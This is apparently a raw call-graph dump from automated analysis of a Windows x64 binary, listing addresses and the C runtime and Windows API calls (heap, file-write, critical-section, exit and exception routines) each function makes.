7fef9d27bb9 18520->18521 18521->18518 18522 7fef9d27bc8 GetFileType 18521->18522 18522->18518 18524 7fef9d27beb InitializeCriticalSectionAndSpinCount 18522->18524 18524->18518 18524->18525 18526 7fef9d314e1 18527 7fef9d314ef DecodePointer 18526->18527 18528 7fef9d31520 DecodePointer 18526->18528 18527->18528 18529 7fef9d3150f 18527->18529 18530 7fef9d31540 18528->18530 18529->18528 18531 7fef9d23280 __GSHandlerCheck 8 API calls 18530->18531 18532 7fef9d3157a 18531->18532 17681 7fef9d2a7e9 17682 7fef9d2a7f9 17681->17682 17683 7fef9d2a80a 17682->17683 17684 7fef9d23280 __GSHandlerCheck 8 API calls 17682->17684 17685 7fef9d2aa30 17684->17685 17686 7fef9d2c7e9 17687 7fef9d2c80d 17686->17687 17688 7fef9d2c90c EncodePointer EncodePointer 17686->17688 17690 7fef9d2c872 17687->17690 17695 7fef9d24a00 17687->17695 17691 7fef9d2c8ca 17688->17691 17690->17691 17692 7fef9d24a00 _realloc_dbg 30 API calls 17690->17692 17693 7fef9d2c8ce EncodePointer 17690->17693 17694 7fef9d2c8bd 17692->17694 17693->17688 17694->17691 17694->17693 17696 7fef9d24a22 17695->17696 17701 7fef9d24a70 17696->17701 17698 7fef9d24a4c 17712 7fef9d29360 LeaveCriticalSection 17698->17712 17700 7fef9d24a5b 17700->17690 17703 7fef9d24ad4 _realloc_dbg 17701->17703 17711 7fef9d24aae _calloc_dbg_impl 17701->17711 17702 7fef9d26380 _CrtIsValidHeapPointer HeapValidate 17707 7fef9d24e2c 17702->17707 17703->17702 17703->17711 17704 7fef9d24f90 17728 7fef9d2ba60 17704->17728 17705 7fef9d24f64 17713 7fef9d2bc30 17705->17713 17707->17704 17707->17705 17707->17711 17709 7fef9d24fa6 17710 7fef9d24fba HeapSize 17709->17710 17709->17711 17710->17711 17711->17698 17712->17700 17714 7fef9d2bc50 17713->17714 17715 7fef9d2bc5f 17713->17715 17739 7fef9d2abf0 17714->17739 17717 7fef9d2bc67 17715->17717 17723 7fef9d2bc78 17715->17723 17719 7fef9d2c020 _free_base 2 API calls 17717->17719 17718 7fef9d2bcba 17721 7fef9d2abb0 _callnewh DecodePointer 17718->17721 17726 7fef9d2bc5a _get_errno_from_oserr 17719->17726 17720 7fef9d2bc9a HeapReAlloc 17720->17723 17721->17726 17722 7fef9d2bce4 17724 7fef9d2bcee GetLastError 17722->17724 17722->17726 17723->17718 17723->17720 17723->17722 17725 7fef9d2abb0 _callnewh DecodePointer 17723->17725 17727 7fef9d2bd1f GetLastError 17723->17727 17724->17726 17725->17723 17726->17711 17727->17726 17729 7fef9d2ba76 17728->17729 17730 7fef9d2bb07 17729->17730 17731 7fef9d2bacc 17729->17731 17732 7fef9d2bb32 HeapSize HeapReAlloc 17730->17732 17736 7fef9d2bb00 _get_errno_from_oserr 17730->17736 17734 7fef9d2bd70 _invalid_parameter 17 API calls 17731->17734 17733 7fef9d2bb74 17732->17733 17732->17736 17735 7fef9d2bba0 GetLastError 17733->17735 17745 7fef9d2bbd0 HeapQueryInformation 17733->17745 17734->17736 17735->17736 17736->17709 17740 7fef9d2ac4d 17739->17740 17742 7fef9d2ac0a 17739->17742 17741 7fef9d2abb0 _callnewh DecodePointer 17740->17741 17743 7fef9d2ac21 17741->17743 17742->17743 17744 7fef9d2abb0 _callnewh DecodePointer 17742->17744 17743->17726 17744->17742 17746 7fef9d2bb90 17745->17746 17746->17735 17746->17736 18537 7fef9d39aeb 18538 7fef9d39b2c 18537->18538 18539 7fef9d39b18 18537->18539 18541 7fef9d3ab10 17 API calls 18538->18541 18540 7fef9d39520 19 API calls 18539->18540 18540->18538 18542 7fef9d39b38 18541->18542 18543 7fef9d39c04 18542->18543 18550 7fef9d39bae GetConsoleMode 18542->18550 18544 7fef9d3a1cb 18543->18544 18547 7fef9d39c23 GetConsoleCP 18543->18547 18545 7fef9d3a205 18544->18545 18546 7fef9d3a8ad WriteFile 18544->18546 18548 7fef9d3a400 18545->18548 18551 7fef9d3a21a 18545->18551 18549 7fef9d3a923 GetLastError 18546->18549 18563 7fef9d39dd9 _dosmaperr __doserrno 18546->18563 18569 7fef9d39c4d 18547->18569 18552 7fef9d3a40e 18548->18552 18566 7fef9d3a5f3 18548->18566 18549->18563 18550->18543 18553 7fef9d3a33e WriteFile 18551->18553 18551->18563 18559 7fef9d3a531 WriteFile 18552->18559 18552->18563 18553->18551 18558 7fef9d3a3ea GetLastError 18553->18558 18554 7fef9d23280 __GSHandlerCheck 8 API calls 18557 7fef9d3a9f5 18554->18557 18555 7fef9d39f66 WideCharToMultiByte 18560 7fef9d39fbf WriteFile 18555->18560 18555->18563 18556 7fef9d3a726 WideCharToMultiByte 18561 7fef9d3a791 GetLastError 18556->18561 18556->18566 18558->18563 18559->18552 18562 7fef9d3a5dd GetLastError 18559->18562 18564 7fef9d3a050 GetLastError 18560->18564 18560->18569 18561->18563 18562->18563 18563->18554 18564->18563 18565 7fef9d3a7b0 WriteFile 18565->18566 18567 7fef9d3a857 GetLastError 18565->18567 18566->18556 18566->18563 18566->18565 18567->18566 18568 7fef9d3f330 MultiByteToWideChar MultiByteToWideChar wcsxfrm 18568->18569 18569->18555 18569->18563 18569->18568 18570 7fef9d3a158 GetLastError 18569->18570 18571 7fef9d3a06d WriteFile 18569->18571 18573 7fef9d3fc00 WriteConsoleW CreateFileW _putwch_nolock 18569->18573 18574 7fef9d3a1b5 GetLastError 18569->18574 18570->18563 18571->18569 18572 7fef9d3a103 GetLastError 18571->18572 18572->18563 18573->18569 18574->18563 16649 18000c85c 16650 18000c8c2 16649->16650 16651 1800178a8 CreateProcessW 16650->16651 16652 18000ca47 16651->16652 18598 7fef9d270e6 18599 7fef9d27090 _exit 33 API calls 18598->18599 18600 7fef9d270f0 18599->18600 17756 7fef9d291ea 17757 7fef9d291ef 17756->17757 17758 7fef9d274e0 __crtExitProcess 3 API calls 17757->17758 17759 7fef9d29203 17758->17759 17760 7fef9d375e9 17761 7fef9d375f4 17760->17761 17764 7fef9d375fb 17760->17764 17762 7fef9d23280 __GSHandlerCheck 8 API calls 17761->17762 17763 7fef9d37d85 17762->17763 17765 7fef9d2bd70 _invalid_parameter 17 API calls 17764->17765 17765->17761 18611 7fef9d2d0ea 18613 7fef9d2d0ef 18611->18613 18612 7fef9d2d0fc 18613->18612 18614 7fef9d27090 _exit 33 API calls 18613->18614 18615 7fef9d2d209 18613->18615 18614->18615 18617 7fef9d2d289 18615->18617 18619 7fef9d23d00 RtlEncodePointer 18615->18619 18617->18612 18620 7fef9d29360 LeaveCriticalSection 18617->18620 18619->18617 18620->18612 17770 7fef9d2c990 17774 7fef9d24980 17770->17774 17772 7fef9d2c9b8 EncodePointer 17773 7fef9d2c9e5 17772->17773 17775 7fef9d249cb _calloc_dbg_impl 17774->17775 17775->17772 17776 7fef9d35393 17777 7fef9d353a0 17776->17777 17778 7fef9d353b4 __SehTransFilter 17777->17778 17779 7fef9d353cc 17777->17779 17785 7fef9d354a0 RaiseException 17778->17785 17786 7fef9d354a0 RaiseException 17779->17786 17781 7fef9d353ca 17783 7fef9d2ed30 _FindAndUnlinkFrame 36 API calls 17781->17783 17784 7fef9d353e1 _IsExceptionObjectToBeDestroyed __SehTransFilter 17783->17784 17785->17781 17786->17781 18625 7fef9d34a95 18627 7fef9d34aad __SehTransFilter 18625->18627 18626 7fef9d34c2b 18627->18626 18628 7fef9d35180 __SehTransFilter 38 API calls 18627->18628 18628->18626 18629 7fef9d32695 18631 7fef9d326a0 18629->18631 18630 7fef9d326ab 18631->18630 18632 7fef9d2bd70 _invalid_parameter 17 API calls 18631->18632 18632->18630 16494 7fef9d24399 16495 7fef9d243a6 16494->16495 16497 7fef9d24377 16494->16497 16497->16494 16497->16495 16498 7fef9d2abb0 DecodePointer 16497->16498 16499 7fef9d2abd3 16498->16499 16499->16497 16500 7fef9d23599 16503 7fef9d28900 16500->16503 16502 7fef9d2359e 16504 7fef9d28920 16503->16504 16505 7fef9d28936 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 16503->16505 16504->16502 16506 7fef9d289de 16505->16506 16506->16504 18653 7fef9d2c080 HeapValidate 18654 7fef9d2c0a2 18653->18654 17809 7fef9d3b580 17810 7fef9d3b5fa 17809->17810 17811 7fef9d3b6cb 17810->17811 17812 7fef9d3b676 17810->17812 17813 7fef9d3afb0 _fflush_nolock 17 API calls 17811->17813 17814 7fef9d3b6fe 17811->17814 17815 7fef9d2bd70 _invalid_parameter 17 API calls 17812->17815 17813->17814 17816 7fef9d3b8a2 17814->17816 17817 7fef9d3b84d 17814->17817 17818 7fef9d3b6aa _LocaleUpdate::~_LocaleUpdate 17815->17818 17820 7fef9d3b915 17816->17820 17825 7fef9d3b96a 17816->17825 17819 7fef9d2bd70 _invalid_parameter 17 API calls 17817->17819 17821 7fef9d23280 __GSHandlerCheck 8 API calls 17818->17821 17819->17818 17823 7fef9d2bd70 _invalid_parameter 17 API calls 17820->17823 17822 7fef9d3cd90 17821->17822 17823->17818 17824 7fef9d3cc93 17824->17818 17826 7fef9d2bd70 _invalid_parameter 17 API calls 17824->17826 17825->17824 17827 7fef9d3bada 17825->17827 17826->17818 17828 7fef9d2bd70 _invalid_parameter 17 API calls 17827->17828 17828->17818 17842 7fef9d3df8d 17843 7fef9d3dfbb 17842->17843 17844 7fef9d3eadf 17843->17844 17845 7fef9d3eec0 25 API calls 17843->17845 17853 7fef9d3da75 17843->17853 17846 7fef9d3ef10 25 API calls 17844->17846 17845->17844 17847 7fef9d3eafd 17846->17847 17848 7fef9d3eb33 17847->17848 17850 7fef9d3eec0 25 API calls 17847->17850 17849 7fef9d3ec29 17848->17849 17860 7fef9d3eb49 _CrtMemDumpAllObjectsSince 17848->17860 17851 7fef9d3ebda 17849->17851 17852 7fef9d3ef10 25 API calls 17849->17852 17850->17848 17851->17853 17856 7fef9d3eec0 25 API calls 17851->17856 17852->17851 17854 7fef9d3eca1 17853->17854 17858 7fef9d3dbb5 17853->17858 17855 7fef9d2bd70 _invalid_parameter 17 API calls 17854->17855 17863 7fef9d3dbe9 _LocaleUpdate::~_LocaleUpdate 17854->17863 17855->17863 17856->17853 17857 7fef9d23280 __GSHandlerCheck 8 API calls 17859 7fef9d3ed9e 17857->17859 17862 7fef9d2bd70 _invalid_parameter 17 API calls 17858->17862 17860->17851 17861 7fef9d3f000 wcsxfrm 2 API calls 17860->17861 17864 7fef9d3ee40 25 API calls 17860->17864 17861->17860 17862->17863 17863->17857 17864->17860 18655 7fef9d210b0 18656 7fef9d210da 18655->18656 18657 7fef9d210fc 18656->18657 18658 7fef9d21000 4 API calls 18656->18658 18659 7fef9d23280 __GSHandlerCheck 8 API calls 18657->18659 18658->18657 18660 7fef9d2112c 18659->18660 17874 7fef9d39fba 17882 7fef9d39c4d 17874->17882 17875 7fef9d3a06d WriteFile 17876 7fef9d3a103 GetLastError 17875->17876 17875->17882 17881 7fef9d39dd9 _dosmaperr __doserrno 17876->17881 17877 7fef9d23280 __GSHandlerCheck 8 API calls 17879 7fef9d3a9f5 17877->17879 17878 7fef9d39f66 WideCharToMultiByte 17880 7fef9d39fbf WriteFile 17878->17880 17878->17881 17880->17882 17884 7fef9d3a050 GetLastError 17880->17884 17881->17877 17882->17875 17882->17878 17882->17881 17883 7fef9d3fc00 WriteConsoleW CreateFileW _putwch_nolock 17882->17883 17885 7fef9d3a158 GetLastError 17882->17885 17886 7fef9d3f330 MultiByteToWideChar MultiByteToWideChar wcsxfrm 17882->17886 17887 7fef9d3a1b5 GetLastError 17882->17887 17883->17882 17884->17881 17885->17881 17886->17882 17887->17881 18661 7fef9d3bcbd 18662 7fef9d3b99c 18661->18662 18663 7fef9d3cc93 18662->18663 18666 7fef9d3bada 18662->18666 18664 7fef9d2bd70 _invalid_parameter 17 API calls 18663->18664 18667 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 18663->18667 18664->18667 18665 7fef9d23280 __GSHandlerCheck 8 API calls 18668 7fef9d3cd90 18665->18668 18669 7fef9d2bd70 _invalid_parameter 17 API calls 18666->18669 18667->18665 18669->18667 18674 7fef9d3809f 18675 7fef9d38145 _calloc_dbg_impl 18674->18675 18676 7fef9d380b0 _calloc_dbg_impl 18674->18676 18675->18676 18677 7fef9d2bd70 _invalid_parameter 17 API calls 18675->18677 18677->18676 18678 7fef9d32c9f 18679 7fef9d32ca6 18678->18679 18681 7fef9d32caf 18678->18681 18680 7fef9d2bd70 _invalid_parameter 17 API calls 18679->18680 18679->18681 18680->18681 17903 7fef9d3a7a0 17909 7fef9d3a61f 17903->17909 17904 7fef9d3a726 WideCharToMultiByte 17905 7fef9d3a791 GetLastError 17904->17905 17904->17909 17911 7fef9d3a887 _dosmaperr __doserrno 17905->17911 17906 7fef9d23280 __GSHandlerCheck 8 API calls 17908 7fef9d3a9f5 17906->17908 17907 7fef9d3a7b0 WriteFile 17907->17909 17910 7fef9d3a857 GetLastError 17907->17910 17909->17904 17909->17907 17909->17911 17910->17909 17911->17906 16644 7fef9d2aca8 16645 7fef9d2acb2 16644->16645 16646 7fef9d274e0 __crtExitProcess 3 API calls 16645->16646 16647 7fef9d2acbc RtlAllocateHeap 16646->16647 18694 7fef9d25cad 18698 7fef9d25cb8 18694->18698 18695 7fef9d25e1a _realloc_dbg 18697 7fef9d26201 18698->18695 18699 7fef9d29360 LeaveCriticalSection 18698->18699 18699->18697 17924 7fef9d23faa 17925 7fef9d23e30 LeaveCriticalSection 17924->17925 17926 7fef9d23fb6 GetCurrentThreadId 17925->17926 17927 7fef9d23fea SetLastError 17926->17927 17928 7fef9d2cb4f 17929 7fef9d2cb5c 17928->17929 17932 7fef9d2cbeb GetStdHandle 17929->17932 17933 7fef9d2cc99 17929->17933 17956 7fef9d2cc94 17929->17956 17930 7fef9d23280 __GSHandlerCheck 8 API calls 17931 7fef9d2cf0f 17930->17931 17934 7fef9d2cc07 std::exception::_Copy_str 17932->17934 17932->17956 17935 7fef9d31640 17 API calls 17933->17935 17933->17956 17937 7fef9d2cc73 WriteFile 17934->17937 17934->17956 17936 7fef9d2cd10 17935->17936 17938 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17936->17938 17937->17956 17939 7fef9d2cd3d GetModuleFileNameW 17938->17939 17940 7fef9d2cd68 17939->17940 17945 7fef9d2cdb1 17939->17945 17941 7fef9d31640 17 API calls 17940->17941 17942 7fef9d2cd84 17941->17942 17943 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17942->17943 17943->17945 17944 7fef9d2ce5e 17946 7fef9d32d80 17 API calls 17944->17946 17945->17944 17957 7fef9d33380 17945->17957 17947 7fef9d2ce76 17946->17947 17948 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17947->17948 17950 7fef9d2cea3 17948->17950 17952 7fef9d32d80 17 API calls 17950->17952 17951 7fef9d2ce31 17953 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17951->17953 17954 7fef9d2ceb9 17952->17954 17953->17944 17955 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17954->17955 17955->17956 17956->17930 17959 7fef9d333a6 17957->17959 17958 7fef9d3342f 17961 7fef9d2bd70 _invalid_parameter 17 API calls 17958->17961 17959->17958 17960 7fef9d3346d _calloc_dbg_impl 17959->17960 17963 7fef9d333bc _calloc_dbg_impl 17959->17963 17962 7fef9d335fb 17960->17962 17960->17963 17965 7fef9d33639 _calloc_dbg_impl 17960->17965 17961->17963 17964 7fef9d2bd70 _invalid_parameter 17 API calls 17962->17964 17963->17951 17964->17963 17965->17963 17966 7fef9d2bd70 _invalid_parameter 17 API calls 17965->17966 17966->17963 18713 7fef9d25854 18714 7fef9d2585b _calloc_dbg_impl 18713->18714 18715 7fef9d2c020 _free_base 2 API calls 18714->18715 18716 7fef9d259d5 18715->18716 17990 7fef9d40550 17991 7fef9d40575 17990->17991 17992 7fef9d4055e 17990->17992 17992->17991 17993 7fef9d40568 CloseHandle 17992->17993 17993->17991 17998 7fef9d3595c 17999 7fef9d2cf50 terminate 35 API calls 17998->17999 18000 7fef9d35961 17999->18000 18001 7fef9d25357 18004 7fef9d29360 LeaveCriticalSection 18001->18004 18003 7fef9d25361 18004->18003 18729 7fef9d2a057 18730 7fef9d2a061 18729->18730 18731 7fef9d2a234 18730->18731 18737 7fef9d2a08e __initmbctable 18730->18737 18732 7fef9d2a25d IsValidCodePage 18731->18732 18736 7fef9d2a22d __initmbctable 18731->18736 18734 7fef9d2a27b GetCPInfo 18732->18734 18732->18736 18733 7fef9d23280 __GSHandlerCheck 8 API calls 18735 7fef9d2a470 18733->18735 18734->18736 18739 7fef9d2a295 __initmbctable 18734->18739 18736->18733 18738 7fef9d2a5e0 __initmbctable 19 API calls 18737->18738 18738->18736 18740 7fef9d2a5e0 __initmbctable 19 API calls 18739->18740 18740->18736 18746 7fef9d2405b 18747 7fef9d2406e 18746->18747 18752 7fef9d29360 LeaveCriticalSection 18747->18752 18750 7fef9d24224 18751 7fef9d241bb _updatetlocinfoEx_nolock 18753 7fef9d29360 LeaveCriticalSection 18751->18753 18752->18751 18753->18750 18016 7fef9d2e55a 18017 7fef9d2e564 18016->18017 18018 7fef9d2e5c2 RtlLookupFunctionEntry 18017->18018 18019 7fef9d2e601 18017->18019 18018->18019 18754 7fef9d2425a FlsGetValue FlsSetValue 18755 7fef9d24283 18754->18755 16626 7fef9d27640 GetStartupInfoW 16635 7fef9d27676 _calloc_dbg 16626->16635 16627 7fef9d27689 16628 7fef9d27ce0 SetHandleCount 16628->16627 16629 7fef9d27ab9 16629->16628 16630 7fef9d27b95 GetStdHandle 16629->16630 16631 7fef9d27c7b 16629->16631 16630->16631 16632 7fef9d27bb9 16630->16632 16631->16628 16632->16631 16633 7fef9d27bc8 GetFileType 16632->16633 16633->16631 16634 7fef9d27beb InitializeCriticalSectionAndSpinCount 16633->16634 16634->16627 16634->16631 16635->16627 16635->16629 16637 7fef9d27a32 InitializeCriticalSectionAndSpinCount 16635->16637 16638 7fef9d27a19 GetFileType 16635->16638 16637->16627 16637->16629 16638->16629 16638->16637 18020 7fef9d21140 18021 7fef9d2116a 18020->18021 18022 7fef9d2118c 18021->18022 18023 7fef9d2119a FileTimeToSystemTime 18021->18023 18025 7fef9d23280 __GSHandlerCheck 8 API calls 18022->18025 18023->18022 18024 7fef9d211ae 18023->18024 18028 7fef9d21000 GetThreadLocale GetDateFormatA 18024->18028 18027 7fef9d211d0 18025->18027 18029 7fef9d21062 GetThreadLocale GetTimeFormatA 18028->18029 18030 7fef9d2105b 18028->18030 18029->18030 18030->18022 18756 7fef9d28040 18757 7fef9d28056 18756->18757 18758 7fef9d2805b GetModuleFileNameA 18756->18758 18759 7fef9d2aa40 __initmbctable 24 API calls 18757->18759 18760 7fef9d28083 18758->18760 18759->18758 18761 7fef9d29240 18762 7fef9d2925f 18761->18762 18763 7fef9d2924d 18761->18763 18764 7fef9d29281 InitializeCriticalSectionAndSpinCount 18762->18764 18765 7fef9d29295 18762->18765 18764->18765 18767 7fef9d29360 LeaveCriticalSection 18765->18767 18767->18763 18768 7fef9d2ae40 18769 7fef9d2d490 std::exception::_Copy_str 17 API calls 18768->18769 18770 7fef9d2ae59 18769->18770 18771 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18770->18771 18772 7fef9d2ae86 std::exception::_Copy_str 18771->18772 18773 7fef9d30fd0 17 API calls 18772->18773 18776 7fef9d2af3a std::exception::_Copy_str 18772->18776 18774 7fef9d2af0d 18773->18774 18775 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18774->18775 18775->18776 18777 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 18776->18777 18779 7fef9d2b2e0 18776->18779 18777->18779 18778 7fef9d2b33e 18781 7fef9d30cc0 25 API calls 18778->18781 18779->18778 18780 7fef9d2d490 std::exception::_Copy_str 17 API calls 18779->18780 18782 7fef9d2b311 18780->18782 18783 7fef9d2b358 18781->18783 18785 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18782->18785 18784 7fef9d2b37d 18783->18784 18786 7fef9d2cff0 terminate 34 API calls 18783->18786 18789 7fef9d23280 __GSHandlerCheck 8 API calls 18784->18789 18785->18778 18787 7fef9d2b373 18786->18787 18788 7fef9d27090 _exit 33 API calls 18787->18788 18788->18784 18790 7fef9d2b3a0 18789->18790 18031 7fef9d3f53e 18032 7fef9d3f55c 18031->18032 18033 7fef9d3f74d 18032->18033 18034 7fef9d40170 23 API calls 18032->18034 18035 7fef9d23280 __GSHandlerCheck 8 API calls 18033->18035 18034->18033 18036 7fef9d3f7c5 18035->18036 18791 7fef9d41040 18794 7fef9d2e8f0 18791->18794 18793 7fef9d4108f 18795 7fef9d2e90d 18794->18795 18796 7fef9d33cc0 __SehTransFilter 39 API calls 18795->18796 18797 7fef9d2e980 18796->18797 18797->18793 18798 7fef9d3dc41 18799 7fef9d3ee40 25 API calls 18798->18799 18800 7fef9d3da75 18799->18800 18801 7fef9d3eca1 18800->18801 18805 7fef9d3dbb5 18800->18805 18802 7fef9d2bd70 _invalid_parameter 17 API calls 18801->18802 18803 7fef9d3dbe9 _LocaleUpdate::~_LocaleUpdate 18801->18803 18802->18803 18804 7fef9d23280 __GSHandlerCheck 8 API calls 18803->18804 18806 7fef9d3ed9e 18804->18806 18807 7fef9d2bd70 _invalid_parameter 17 API calls 18805->18807 18807->18803 18808 7fef9d40e40 18809 7fef9d40e5e 18808->18809 18810 7fef9d40e50 18808->18810 18810->18809 18811 7fef9d23e00 3 API calls 18810->18811 18811->18809 18812 7fef9d2d04a 18813 7fef9d2d1d8 DecodePointer 18812->18813 18814 7fef9d2d1e8 18813->18814 18815 7fef9d2d1f0 18814->18815 18816 7fef9d27090 _exit 33 API calls 18814->18816 18817 7fef9d2d209 18814->18817 18816->18817 18819 7fef9d2d289 18817->18819 18821 7fef9d23d00 RtlEncodePointer 18817->18821 18819->18815 18822 7fef9d29360 LeaveCriticalSection 18819->18822 18821->18819 18822->18815 16197 7fef9d23471 16198 7fef9d2347a 16197->16198 16207 7fef9d234bc 16197->16207 16199 7fef9d23496 16198->16199 16209 7fef9d270b0 16198->16209 16212 7fef9d27d00 16199->16212 16206 7fef9d234a5 16206->16207 16208 7fef9d23e00 3 API calls 16206->16208 16208->16207 16222 7fef9d27280 16209->16222 16214 7fef9d27d0e 16212->16214 16213 7fef9d2349b 16216 7fef9d23e00 16213->16216 16214->16213 16215 7fef9d27d87 DeleteCriticalSection 16214->16215 16215->16214 16217 7fef9d23e23 16216->16217 16218 7fef9d23e0d FlsFree 16216->16218 16382 7fef9d290b0 16217->16382 16218->16217 16221 7fef9d288d0 HeapDestroy 16221->16206 16223 7fef9d27296 _exit 16222->16223 16224 7fef9d2744e 16223->16224 16225 7fef9d272c7 RtlDecodePointer 16223->16225 16232 7fef9d27368 _initterm 16223->16232 16226 7fef9d2745e 16224->16226 16266 7fef9d27520 16224->16266 16227 7fef9d272e5 DecodePointer 16225->16227 16225->16232 16229 7fef9d270c3 16226->16229 16230 7fef9d27520 _exit LeaveCriticalSection 16226->16230 16240 7fef9d27314 16227->16240 16229->16199 16231 7fef9d27479 16230->16231 16269 7fef9d274e0 16231->16269 16232->16224 16246 7fef9d26210 16232->16246 16237 7fef9d2736d DecodePointer 16245 7fef9d23d00 RtlEncodePointer 16237->16245 16240->16232 16240->16237 16243 7fef9d27391 DecodePointer DecodePointer 16240->16243 16244 7fef9d23d00 RtlEncodePointer 16240->16244 16241 7fef9d27449 16259 7fef9d26f10 16241->16259 16243->16240 16244->16240 16245->16240 16247 7fef9d26229 16246->16247 16248 7fef9d2628f 16247->16248 16249 7fef9d262cb 16247->16249 16272 7fef9d2bd70 DecodePointer 16248->16272 16276 7fef9d29360 LeaveCriticalSection 16249->16276 16252 7fef9d262c3 16252->16224 16253 7fef9d27100 16252->16253 16254 7fef9d27112 16253->16254 16255 7fef9d271e4 DecodePointer 16254->16255 16256 7fef9d271fe 16255->16256 16301 7fef9d23d00 RtlEncodePointer 16256->16301 16258 7fef9d27219 16258->16241 16302 7fef9d263e0 16259->16302 16261 7fef9d26f8e 16263 7fef9d23280 __GSHandlerCheck 8 API calls 16261->16263 16262 7fef9d26f33 16262->16261 16310 7fef9d26660 16262->16310 16265 7fef9d26fa7 16263->16265 16265->16224 16378 7fef9d29360 LeaveCriticalSection 16266->16378 16268 7fef9d2752e 16268->16226 16379 7fef9d27490 GetModuleHandleW 16269->16379 16273 7fef9d2bdd0 16272->16273 16274 7fef9d2bdac 16272->16274 16277 7fef9d2be00 16273->16277 16274->16252 16276->16252 16280 7fef9d2be50 16277->16280 16281 7fef9d2be81 _invoke_watson_if_oneof 16280->16281 16282 7fef9d2be8d RtlCaptureContext RtlLookupFunctionEntry 16280->16282 16281->16282 16283 7fef9d2bf64 16282->16283 16284 7fef9d2bf1c RtlVirtualUnwind 16282->16284 16285 7fef9d2bf84 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16283->16285 16284->16285 16286 7fef9d2bfde _invoke_watson_if_oneof 16285->16286 16289 7fef9d23280 16286->16289 16288 7fef9d2be2d GetCurrentProcess TerminateProcess 16288->16274 16290 7fef9d23289 16289->16290 16291 7fef9d23720 RtlCaptureContext RtlLookupFunctionEntry 16290->16291 16292 7fef9d23294 16290->16292 16293 7fef9d237a5 16291->16293 16294 7fef9d23764 RtlVirtualUnwind 16291->16294 16292->16288 16295 7fef9d237c7 IsDebuggerPresent 16293->16295 16294->16295 16300 7fef9d28d90 16295->16300 16297 7fef9d23826 SetUnhandledExceptionFilter UnhandledExceptionFilter 16298 7fef9d2384e GetCurrentProcess TerminateProcess 16297->16298 16299 7fef9d23844 _invoke_watson_if_oneof 16297->16299 16298->16288 16299->16298 16300->16297 16301->16258 16303 7fef9d263f1 16302->16303 16304 7fef9d26447 16303->16304 16307 7fef9d26480 16303->16307 16305 7fef9d2bd70 _invalid_parameter 17 API calls 16304->16305 16306 7fef9d2647b 16305->16306 16306->16262 16309 7fef9d26504 16307->16309 16314 7fef9d29360 LeaveCriticalSection 16307->16314 16309->16262 16311 7fef9d26681 _CrtMemDumpAllObjectsSince 16310->16311 16315 7fef9d26850 16311->16315 16313 7fef9d26698 _LocaleUpdate::~_LocaleUpdate 16313->16261 16314->16306 16316 7fef9d26871 16315->16316 16317 7fef9d26ba6 16316->16317 16320 7fef9d268ed _CrtIsValidPointer 16316->16320 16345 7fef9d29360 LeaveCriticalSection 16317->16345 16319 7fef9d26bb0 16319->16313 16321 7fef9d2695e IsBadReadPtr 16320->16321 16322 7fef9d26976 16320->16322 16331 7fef9d2692f 16320->16331 16321->16322 16323 7fef9d26ad2 16322->16323 16324 7fef9d26a29 16322->16324 16325 7fef9d26add 16323->16325 16328 7fef9d26b2d 16323->16328 16326 7fef9d26abe 16324->16326 16327 7fef9d26a86 IsBadReadPtr 16324->16327 16330 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 16325->16330 16333 7fef9d26bf0 16326->16333 16327->16326 16327->16331 16328->16331 16332 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 16328->16332 16330->16331 16331->16313 16332->16331 16334 7fef9d26c28 16333->16334 16335 7fef9d26e25 _LocaleUpdate::~_LocaleUpdate 16334->16335 16336 7fef9d26c7a _CrtMemDumpAllObjectsSince 16334->16336 16337 7fef9d23280 __GSHandlerCheck 8 API calls 16335->16337 16340 7fef9d26ce0 _CrtMemDumpAllObjectsSince _CrtMemDumpAllObjectsSince_stat 16336->16340 16346 7fef9d2c260 16336->16346 16338 7fef9d26e89 16337->16338 16338->16331 16350 7fef9d2c0c0 16340->16350 16342 7fef9d26e12 16342->16331 16343 7fef9d26dc7 16343->16342 16353 7fef9d26ea0 16343->16353 16345->16319 16348 7fef9d2c286 _CrtMemDumpAllObjectsSince wcsxfrm 16346->16348 16347 7fef9d2c29d _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 16347->16340 16348->16347 16357 7fef9d2f4d0 16348->16357 16368 7fef9d32260 16350->16368 16352 7fef9d2c103 16352->16343 16354 7fef9d26ed1 16353->16354 16355 7fef9d26ebd 16353->16355 16354->16342 16355->16354 16356 7fef9d2be00 _invoke_watson_if_oneof 16 API calls 16355->16356 16356->16354 16358 7fef9d2f4f9 _CrtMemDumpAllObjectsSince 16357->16358 16361 7fef9d2f570 16358->16361 16360 7fef9d2f550 _LocaleUpdate::~_LocaleUpdate 16360->16347 16362 7fef9d2f599 MultiByteToWideChar 16361->16362 16364 7fef9d2f60b malloc _calloc_dbg_impl _MarkAllocaS 16362->16364 16366 7fef9d2f604 _CrtMemDumpAllObjectsSince_stat 16362->16366 16365 7fef9d2f68b MultiByteToWideChar 16364->16365 16364->16366 16365->16366 16367 7fef9d2f6ca GetStringTypeW 16365->16367 16366->16360 16367->16366 16369 7fef9d3228b 16368->16369 16370 7fef9d322e1 16369->16370 16371 7fef9d3231f 16369->16371 16372 7fef9d2bd70 _invalid_parameter 17 API calls 16370->16372 16373 7fef9d32385 16371->16373 16376 7fef9d323c3 _calloc_dbg_impl 16371->16376 16375 7fef9d32315 _calloc_dbg_impl 16372->16375 16374 7fef9d2bd70 _invalid_parameter 17 API calls 16373->16374 16374->16375 16375->16352 16376->16375 16377 7fef9d2bd70 _invalid_parameter 17 API calls 16376->16377 16377->16375 16378->16268 16380 7fef9d274b2 GetProcAddress 16379->16380 16381 7fef9d274d1 ExitProcess 16379->16381 16380->16381 16383 7fef9d290be 16382->16383 16384 7fef9d2914d 16383->16384 16385 7fef9d290fd DeleteCriticalSection 16383->16385 16386 7fef9d234a0 16384->16386 16387 7fef9d29196 DeleteCriticalSection 16384->16387 16385->16383 16386->16221 